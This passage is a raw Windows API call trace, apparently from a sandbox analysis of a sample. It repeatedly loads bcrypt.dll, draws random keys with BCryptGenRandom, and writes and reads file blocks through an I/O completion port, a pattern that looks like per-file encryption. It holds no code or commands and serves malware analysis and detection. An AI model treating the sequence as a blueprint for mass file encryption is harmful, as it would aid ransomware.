hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.048] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x21f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.049] CloseHandle (hObject=0x170) returned 1 [0139.049] free (_Block=0x3df0008) [0139.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.057] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.057] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.057] free (_Block=0x3e305b8) [0139.057] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.057] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.057] free (_Block=0x1fa91d0) [0139.057] free (_Block=0x77d7a8) [0139.057] free (_Block=0x1fa90b8) [0139.057] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.058] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.059] CloseHandle (hObject=0x170) returned 1 [0139.059] free (_Block=0x3df0008) [0139.059] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.067] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.067] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.067] free (_Block=0x3e305b8) [0139.067] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.067] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.067] free (_Block=0x1fa91d0) [0139.067] free (_Block=0x77d7a8) [0139.067] free (_Block=0x1fa90b8) [0139.067] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.068] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x35f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.069] CloseHandle (hObject=0x170) returned 1 [0139.069] free (_Block=0x3df0008) [0139.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.077] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.077] free (_Block=0x3e305b8) [0139.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.077] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.077] free (_Block=0x1fa91d0) [0139.077] free (_Block=0x77d7a8) [0139.078] free (_Block=0x1fa90b8) [0139.078] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.079] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.079] CloseHandle (hObject=0x170) returned 1 [0139.079] free (_Block=0x3df0008) [0139.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.087] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.087] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.087] free (_Block=0x3e305b8) [0139.087] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.087] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.087] free (_Block=0x1fa91d0) [0139.087] free (_Block=0x77d7a8) [0139.087] free (_Block=0x1fa90b8) [0139.087] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.087] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.088] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2dd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.098] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1204, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.099] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.099] CloseHandle (hObject=0x170) returned 1 [0139.099] free (_Block=0x3df0008) [0139.099] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.182] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.185] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.185] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.185] free (_Block=0x3e305b8) [0139.185] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.185] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.186] free (_Block=0x1fa91d0) [0139.186] free (_Block=0x77d7a8) [0139.186] free (_Block=0x1fa90b8) [0139.186] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.187] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.188] CloseHandle (hObject=0x170) returned 1 [0139.188] free (_Block=0x3df0008) [0139.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.195] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.195] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.195] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.195] free (_Block=0x3e305b8) [0139.195] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.195] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.196] free (_Block=0x1fa91d0) [0139.196] free (_Block=0x77d7a8) [0139.196] free (_Block=0x1fa90b8) [0139.196] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.196] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.197] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.206] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5bfc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.218] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2e7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.228] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4c90, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.241] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x864, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.241] CloseHandle (hObject=0x170) returned 1 [0139.242] free (_Block=0x3df0008) [0139.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.249] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.249] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.249] free (_Block=0x3e305b8) [0139.249] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.249] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.249] free (_Block=0x1fa91d0) [0139.249] free (_Block=0x77d7a8) [0139.249] free (_Block=0x1fa90b8) [0139.249] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.250] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.276] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x35d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.312] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbcc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.312] CloseHandle (hObject=0x170) returned 1 [0139.312] free (_Block=0x3df0008) [0139.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.322] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.322] free (_Block=0x3e305b8) [0139.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.322] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.322] free (_Block=0x1fa91d0) [0139.322] free (_Block=0x77d7a8) [0139.322] free (_Block=0x1fa90b8) [0139.322] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.323] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1dd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.332] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2358, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.344] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3734, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.345] CloseHandle (hObject=0x170) returned 1 [0139.346] free (_Block=0x3df0008) [0139.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, 